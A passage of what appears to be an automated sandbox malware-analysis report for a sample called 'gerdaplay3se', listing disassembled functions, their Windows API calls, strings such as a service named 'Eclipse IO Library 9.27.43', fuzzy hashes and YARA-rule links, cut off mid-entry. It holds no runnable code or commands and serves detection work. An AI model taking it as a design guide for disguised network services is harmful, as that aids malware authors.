Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D64608

Part of subcall function 02D73A8F: _malloc.LIBCMT ref: 02D73AA7

htons.WS2_32(?), ref: 02D64669
htonl.WS2_32(?), ref: 02D6468C
htonl.WS2_32(00000000), ref: 02D64693
htons.WS2_32(00000000), ref: 02D64747
_sprintf.LIBCMT ref: 02D6475D

Part of subcall function 02D688C3: _memmove.LIBCMT ref: 02D688E3

htons.WS2_32(?), ref: 02D646B0

Part of subcall function 02D6966E: __EH_prolog.LIBCMT ref: 02D69673
Part of subcall function 02D6966E: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D696EE
Part of subcall function 02D6966E: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D6970C

Part of subcall function 02D61BA7: __EH_prolog.LIBCMT ref: 02D61BAC
Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61BBC
Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61BEA
Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61C13
Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61C56

Part of subcall function 02D6DE2A: __EH_prolog.LIBCMT ref: 02D6DE2F

htonl.WS2_32(?), ref: 02D6497C
htonl.WS2_32(00000000), ref: 02D64983
htonl.WS2_32(00000000), ref: 02D649C8
htonl.WS2_32(00000000), ref: 02D649CF
htons.WS2_32(?), ref: 02D649EF
htons.WS2_32(?), ref: 02D649F9

Strings

Pz, xrefs: 02D646F1

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
String ID: Pz
API String ID: 1645262487-1603573826
Opcode ID: 6d9dc6ec16cf3578b8361bf86dcb0e5b26bd0234ce24eadd1c90edb45142575e
Instruction ID: e415e5cba9bd327617f7b38bef11e82803d3ad54d5bae97460ec10c03d42ba1b
Opcode Fuzzy Hash: 6d9dc6ec16cf3578b8361bf86dcb0e5b26bd0234ce24eadd1c90edb45142575e
Instruction Fuzzy Hash: 08022771C10259ABEF25DBA4D848BFEBBB9EF08304F10415AE545B7280DB745E88CFA1

Function 02D624E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D624E6
InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D624FC
RtlEnterCriticalSection.NTDLL(?), ref: 02D6250E
RtlLeaveCriticalSection.NTDLL(?), ref: 02D6256D
SetLastError.KERNEL32(00000000,?,7622DFB0), ref: 02D6257F
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7622DFB0), ref: 02D62599
GetLastError.KERNEL32(?,7622DFB0), ref: 02D625A2
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D625F0
InterlockedDecrement.KERNEL32(00000002), ref: 02D6262F
InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D6268E
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D62699
InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D626AD
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7622DFB0), ref: 02D626BD
GetLastError.KERNEL32(?,7622DFB0), ref: 02D626C7

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
String ID:
API String ID: 1213838671-0
Opcode ID: 27974e582a7a706b1001bf407879418c44e48d4edbce649d2b3cef19411e768d
Instruction ID: cbc9b5fd1d984f5d8e779f4479aebb24397922e2625288f91700fdf997b1b10e
Opcode Fuzzy Hash: 27974e582a7a706b1001bf407879418c44e48d4edbce649d2b3cef19411e768d
Instruction Fuzzy Hash: F8612E75910209AFDB10DFA4D988AAEFBB9FF08314F204929E956E7340E734AD54CF61

Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerA.ADVAPI32(Eclipse IO Library 9.27.43,Function_0000235E), ref: 004023C1
SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402420
GetLastError.KERNEL32 ref: 00402422
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
GetLastError.KERNEL32 ref: 00402450
SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402480
CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
CloseHandle.KERNEL32 ref: 004024A1
SetServiceStatus.ADVAPI32(0040A0E0), ref: 004024CA

Strings

Eclipse IO Library 9.27.43, xrefs: 004023BC

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
String ID: Eclipse IO Library 9.27.43
API String ID: 3346042915-2124222407
Opcode ID: 753c8bccf627cb5353d4a294398c8736193124083ae435b11ee25f47cab8285e
Instruction ID: 1420ef795783f2c616889eaeaacfbb85f42c25b2a6fdf7f0143c9c805b11b94c
Opcode Fuzzy Hash: 753c8bccf627cb5353d4a294398c8736193124083ae435b11ee25f47cab8285e
Instruction Fuzzy Hash: D4210C70441309EBD210DF16EF49E567FB8EB85754711C03BE206B22B0D7BA0064EB6E

Function 02D78272 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 02D7827A
_free.LIBCMT ref: 02D78293

Part of subcall function 02D72EB4: HeapFree.KERNEL32(00000000,00000000,?,02D75C12,00000000,00000104,76230A60), ref: 02D72EC8
Part of subcall function 02D72EB4: GetLastError.KERNEL32(00000000,?,02D75C12,00000000,00000104,76230A60), ref: 02D72EDA

_free.LIBCMT ref: 02D782A6
_free.LIBCMT ref: 02D782C4
_free.LIBCMT ref: 02D782D6
_free.LIBCMT ref: 02D782E7
_free.LIBCMT ref: 02D782F2
_free.LIBCMT ref: 02D78316
RtlEncodePointer.NTDLL(007ABA90), ref: 02D7831D
_free.LIBCMT ref: 02D78332
_free.LIBCMT ref: 02D78348
_free.LIBCMT ref: 02D78370

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: 26a3cd59c086431cfbf1aed9d0b84296398cce0bdfc5eb8ecae04c46b551977a
Instruction ID: f01bee30aa8beb04462e52ac5be8fac5e356c04342f7c2ddfd77daa5bc8266f8
Opcode Fuzzy Hash: 26a3cd59c086431cfbf1aed9d0b84296398cce0bdfc5eb8ecae04c46b551977a
Instruction Fuzzy Hash: C4218D36D816509BDB256F29F8889167769EB06761729482AFC08D7300E73CDC61EFE0

Function 0040359E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035B9
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035CD
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035F9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403631
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403653
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402DE4), ref: 0040366C
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 0040367F
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004036BD

Strings

-@, xrefs: 00403667, 00403659

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID: -@
API String ID: 1823725401-2999422947
Opcode ID: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
Instruction ID: a052efc5f8264b04540ba139265ff63877c4dc4e75c0ae38b6650f7b3518fcca
Opcode Fuzzy Hash: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
Instruction Fuzzy Hash: 7A31F0B24042217EDB303F785C8883B7E9CE64574A7120D3BF542E3390E67A8E814AAD

Function 02D63423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D63428
GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D6346B
GetProcAddress.KERNEL32(00000000), ref: 02D63472
GetLastError.KERNEL32 ref: 02D63486
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D634D7
RtlEnterCriticalSection.NTDLL(00000018), ref: 02D634ED
RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D63518

Strings

CancelIoEx, xrefs: 02D63461
KERNEL32, xrefs: 02D63466

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
String ID: CancelIoEx$KERNEL32
API String ID: 2902213904-434325024
Opcode ID: 00bb6c5cff57b148d1b65047cbb242b5d51609fa5c815f180ca05da37bb91a16
Instruction ID: 9d4e30c9ecf191ed8e96df83c2f81f30f713bee13233d71a9ef711a18b9b6b45
Opcode Fuzzy Hash: 00bb6c5cff57b148d1b65047cbb242b5d51609fa5c815f180ca05da37bb91a16
Instruction Fuzzy Hash: BA317C75904205DFDB01AF68D888AAABBF9FF49711F2084A9E8159B380D774DD10CBA1

Function 00405408 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 50libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 0040541A
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405432
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405443
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405450

Strings

MessageBoxA, xrefs: 0040542C
xe@, xrefs: 00405476, 0040547A
GetLastActivePopup, xrefs: 00405445
user32.dll, xrefs: 00405415
GetActiveWindow, xrefs: 0040543D

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
API String ID: 2238633743-4073082454
Opcode ID: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
Instruction ID: 002c49bf34bfddc632f277928187d9a53126bd14f393e8a72b926efab3457658
Opcode Fuzzy Hash: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
Instruction Fuzzy Hash: E1018431740705AFC7109FB4AD80E6B7AE9FB48791309843BB955F22A1D778C860CF69

Function 00403C59 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403CC6
GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00403D9C
WriteFile.KERNEL32(00000000), ref: 00403DA3

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00403D72
Runtime Error!Program: , xrefs: 00403D2C
..., xrefs: 00403D18
<program name unknown>, xrefs: 00403CD6
r@, xrefs: 00403C74

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $r@
API String ID: 3784150691-1191147370
Opcode ID: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
Instruction ID: 901e413bd7d296cb1b0b97d790854a8d5494ec17f79a926850544caa0371b074
Opcode Fuzzy Hash: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
Instruction Fuzzy Hash: F831C772A04208AEEF20EF60DE49F9A776CEF45304F1004BBF545F61C1D6B8AA858A59

Function 004058D5 Relevance: 13.7, APIs: 9, Instructions: 177COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 00405917
LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405933
LCMapStringA.KERNEL32(00000000,?,00000000,00200020,004051A5,?,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 0040597C
MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 004059B4
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A0C
LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A22
LCMapStringW.KERNEL32(00000000,?,004051A5,00000000,004051A5,?,?,004051A5,00200020,00000000,?,00000000), ref: 00405A55
LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405ABD

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
Instruction ID: ad677ee5f46337090c489763c5b1535e0d4a7e7cc2f37d679e5ddd81b555dfe6
Opcode Fuzzy Hash: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
Instruction Fuzzy Hash: 8B516C71A00609EFCF218FA5DD85A9F7FB5FB48750F14422AF911B21A0D3398921DF69

Function 02D71550 Relevance: 10.6, APIs: 7, Instructions: 132COMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100002,00000000,00000000,84A2267A), ref: 02D715F0
CloseHandle.KERNEL32(00000000), ref: 02D71605
ResetEvent.KERNEL32(00000000,84A2267A), ref: 02D7160F
CloseHandle.KERNEL32(00000000,84A2267A), ref: 02D71644
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,84A2267A), ref: 02D716BA
CloseHandle.KERNEL32(00000000), ref: 02D716CF

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateOpenReset
String ID:
API String ID: 1285874450-0
Opcode ID: 1fe8f5e80edf85325545ae110f860cc844df78e5babf9d1cfe2e05e52391a236
Instruction ID: 65f296ea53e7cd2d30d0385e74256b9af5827b2baeed8bdef4da4fab04394eef
Opcode Fuzzy Hash: 1fe8f5e80edf85325545ae110f860cc844df78e5babf9d1cfe2e05e52391a236
Instruction Fuzzy Hash: E0412C74D04358ABDF20DFA5D844BADBBB8EB05724F244219E819AB380E778DD05CBA1

Function 02D62081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000001), ref: 02D620AC
SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D620CD
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D620D8
InterlockedDecrement.KERNEL32(?), ref: 02D6213E
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D6217A
InterlockedDecrement.KERNEL32(?), ref: 02D62187
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D621A6

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
String ID:
API String ID: 1171374749-0
Opcode ID: 25c9de8f527684a012988735377b353a61cbf753b2d1727dd7c3e22425543d68
Instruction ID: b0d5ae161a7c5374615cdcc21ce17a7273f88465de38a61d57ebe751d5e4ebcf
Opcode Fuzzy Hash: 25c9de8f527684a012988735377b353a61cbf753b2d1727dd7c3e22425543d68
Instruction Fuzzy Hash: A54148755087019FD321DF25D888A6BBBF9EBC8754F104A1EE89A82350D734E909CFA1

Function 02D71662 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02D71E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D7166E,?,?), ref: 02D71E3F
Part of subcall function 02D71E10: CloseHandle.KERNEL32(00000000,?,?,02D7166E,?,?), ref: 02D71E54
Part of subcall function 02D71E10: SetEvent.KERNEL32(00000000,02D7166E,?,?), ref: 02D71E67

OpenEventA.KERNEL32(00100002,00000000,00000000,84A2267A), ref: 02D715F0
CloseHandle.KERNEL32(00000000), ref: 02D71605
ResetEvent.KERNEL32(00000000,84A2267A), ref: 02D7160F
CloseHandle.KERNEL32(00000000,84A2267A), ref: 02D71644
__CxxThrowException@8.LIBCMT ref: 02D71675

Part of subcall function 02D7449A: RaiseException.KERNEL32(?,?,02D6FA96,?,?,?,?,?,?,?,02D6FA96,?,02D90F78,?), ref: 02D744EF

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,84A2267A), ref: 02D716BA
CloseHandle.KERNEL32(00000000), ref: 02D716CF

Part of subcall function 02D71B50: GetCurrentProcessId.KERNEL32(?), ref: 02D71BA9

WaitForSingleObject.KERNEL32(00000000,000000FF,84A2267A), ref: 02D716DF

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
String ID:
API String ID: 2227236058-0
Opcode ID: 1611b8f19c878152bdd8dfba3069ff481d64e669ef60d8e26fe53cd054910034
Instruction ID: 2032e26d97e86c463b055b5734f3ca99b0af42678e7be10915857987df234887
Opcode Fuzzy Hash: 1611b8f19c878152bdd8dfba3069ff481d64e669ef60d8e26fe53cd054910034
Instruction Fuzzy Hash: 85313975D00359ABDF20DBA49C84BADB7B9AF05715F180229E81DEB380F768DD05CB61

Function 00404618 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403A36), ref: 00404639
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403A36), ref: 0040465D
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403A36), ref: 00404677
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403A36), ref: 00404738
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403A36), ref: 0040474F

Strings

r@, xrefs: 00404698, 004046A1, 004046AA, 004046B2
r@, xrefs: 00404625, 00404681, 0040468A, 00404693, 0040473E

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: AllocVirtual$FreeHeap
String ID: r@$r@
API String ID: 714016831-1712950306
Opcode ID: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
Instruction ID: 6d2ae56a8b2e66d9b660bb9c1c671dd7469dd609f739855ae4ec176a3c74651c
Opcode Fuzzy Hash: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
Instruction Fuzzy Hash: 3531BEB0940702ABD3309F24DD44B66B7A4EB86755F11463BF265BB2D0E7B8A8418B4D

Function 02D75CD4 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 02D75CD4

Part of subcall function 02D78442: RtlEncodePointer.NTDLL(00000000), ref: 02D78445
Part of subcall function 02D78442: __initp_misc_winsig.LIBCMT ref: 02D78460
Part of subcall function 02D78442: GetModuleHandleW.KERNEL32(kernel32.dll,?,02D91578,00000008,00000003,02D90F5C,?,00000001), ref: 02D791C1
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D791D5
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D791E8
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D791FB
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D7920E
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02D79221
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02D79234
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02D79247
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D7925A
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02D7926D
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02D79280
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02D79293
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02D792A6
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02D792B9
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02D792CC
Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02D792DF

__mtinitlocks.LIBCMT ref: 02D75CD9
__mtterm.LIBCMT ref: 02D75CE2

Part of subcall function 02D75D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02D78878
Part of subcall function 02D75D4A: _free.LIBCMT ref: 02D7887F
Part of subcall function 02D75D4A: RtlDeleteCriticalSection.NTDLL(02D93978), ref: 02D788A1

__calloc_crt.LIBCMT ref: 02D75D07
__initptd.LIBCMT ref: 02D75D29
GetCurrentThreadId.KERNEL32 ref: 02D75D30

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: baa7e5f02544a737e9bde09911cfc05f7f6adac09ddad9c47f8893b22ecda321
Instruction ID: 4c697c2faf8bc9372b11a9d13a528d70fa92a2bc79a1fde9a29b035e3f7a394b
Opcode Fuzzy Hash: baa7e5f02544a737e9bde09911cfc05f7f6adac09ddad9c47f8893b22ecda321
Instruction Fuzzy Hash: 83F090325583111AE66476B47C4E79A2786EB02734F600A69EC55C93C0FF1D9C5199A3

Function 02D73404 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02D733B6,00000000), ref: 02D7341E
GetProcAddress.KERNEL32(00000000), ref: 02D73425
RtlEncodePointer.NTDLL(00000000), ref: 02D73431
RtlDecodePointer.NTDLL(00000001), ref: 02D7344E

Strings

RoInitialize, xrefs: 02D7340D
combase.dll, xrefs: 02D73419

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: fad2aa27531263ff7a9d65c12299e2845d4c00433efe8f5eb5aafcdff5940dd3
Instruction ID: 2d528cb2f7d342a69de856bb1121c951d0f2afd1854e3c19f912dcd4a94e5705
Opcode Fuzzy Hash: fad2aa27531263ff7a9d65c12299e2845d4c00433efe8f5eb5aafcdff5940dd3
Instruction Fuzzy Hash: 72E0ED74DE0304AAFB305F70EC89F1537A9B700B47F6058A0B00AD1384D7B58C649B50

Function 02D734D9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D733F3), ref: 02D734F3
GetProcAddress.KERNEL32(00000000), ref: 02D734FA
RtlEncodePointer.NTDLL(00000000), ref: 02D73505
RtlDecodePointer.NTDLL(02D733F3), ref: 02D73520

Strings

combase.dll, xrefs: 02D734EE
RoUninitialize, xrefs: 02D734E2

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: d56081bc98976362771c45546cbfcf732f4b4bac53df9e16e2f5401374a6c740
Instruction ID: 779b0d2c8c78d915800c00d3282ba45a1b329284b001ec3e3e364bcb9911f9bf
Opcode Fuzzy Hash: d56081bc98976362771c45546cbfcf732f4b4bac53df9e16e2f5401374a6c740
Instruction Fuzzy Hash: 04E09A74DE0304ABFB705F60EC49B2577A9F704746F301854F10AE1744E7789D249B54

Function 02D71E70 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(0000002B,84A2267A,?,?,?,?,00000000,02D869F8,000000FF,02D7210A), ref: 02D71EAA
TlsSetValue.KERNEL32(0000002B,02D7210A,?,?,00000000), ref: 02D71F17
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D71F41
HeapFree.KERNEL32(00000000), ref: 02D71F44

Memory Dump Source

